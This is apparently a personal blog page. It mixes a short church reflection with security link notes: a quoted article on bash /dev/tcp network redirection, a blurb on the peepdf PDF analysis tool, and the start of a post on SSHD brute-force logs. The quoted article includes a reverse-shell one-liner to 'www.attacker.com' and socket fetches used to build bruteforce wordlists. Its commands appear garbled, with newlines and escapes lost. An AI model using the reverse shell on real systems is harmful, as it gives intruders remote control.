BTPC’s AmazinGrace
Learnt much today about the non-citizens amongst us, and more importantly, reminded that they are all people too, equally human, and equally in need as we are ourselves.
Interesting Links
Will start linking some of the stuff that potentially would be interesting and useful here. Let's start off with an alternative BASH-fu technique to initiate and listen TCP connections from a (supposedly pwned) Linux box:
http://blog.rootshell.be/2011/05/05/binbash-phone-home/
Now the question will arise: when those network redirection could be helpful? First, bash can used without third party tools to grab data from the network. The example below fetch this blog main page:
exec 5<> /dev/tcp/blog.rootshell.be/80 printf "GET / HTTP/1.0nn" >&5 cat <&5 exec 5>&-Very convenient if you don’t have link or curl installed. Just pipe the output to other commands. This can be used to generate dictionary files to conduct a bruteforce attack:
exec 5<> /dev/tcp/blog.rootshell.be/80 printf "GET / HTTP/1.0nn" >&5 cat <&5 exec 5>&- | sed -e 's/<[!a-zA-Z/][^>]*>//g' foo.tmp | tr " " "n"Another nice example is to make bash “phone home”. Let’s launch a reverse shell to an attacker box:
victim# bash 0</dev/tcp/www.attacker.com/8888 1>&0 2>&0As the bash shell is very common, it can be very interesting! Just use your imagination. to find other examples. A final remark: this feature is not available on all pre-compiled or packaged bash instances! Some UNIX flavors consider it as dangerous (which is true!). If you want to compile your own bash with this feature enabled, the configuration flag is “–enable-net-redirections“.
Also, a tool to help with PDF creation/modification/analysis. Sounds promising:
http://code.google.com/p/peepdf/
peepdf is a Python tool to explore PDF files in order to find out if the file can be harmful or not. The aim of this tool is to provide all the necessary components that a security researcher could need in a PDF analysis without using 3 or 4 tools to make all the tasks. With peepdf it's possible to see all the objects in the document showing the suspicious elements, supports all the most used filters and encodings, it can parse different versions of a file, object streams and encrypted files. With the installation of Spidermonkey and Libemu it provides Javascript and shellcode analysis wrappers too. Apart of this it's able to create new PDF files and to modify existent ones.
Profiling of persistent SSHD brute force attack
Proper setting up and regular monitoring of logs gives you the avenue to know what's really happening with your box sitting out there in the internets, and to anticipate when bad things are about to happen. One of the warning signs would be that someone has been poking around your box, looking for an (easy?) way in.
The natural thing that would jump out at you then, is that this someone has been accessing your box in far higher volumes/durations, especially on services that should not be accessed by others.
This is one example of such accesses on a linux box: SSHD brute forcing over long periods of time.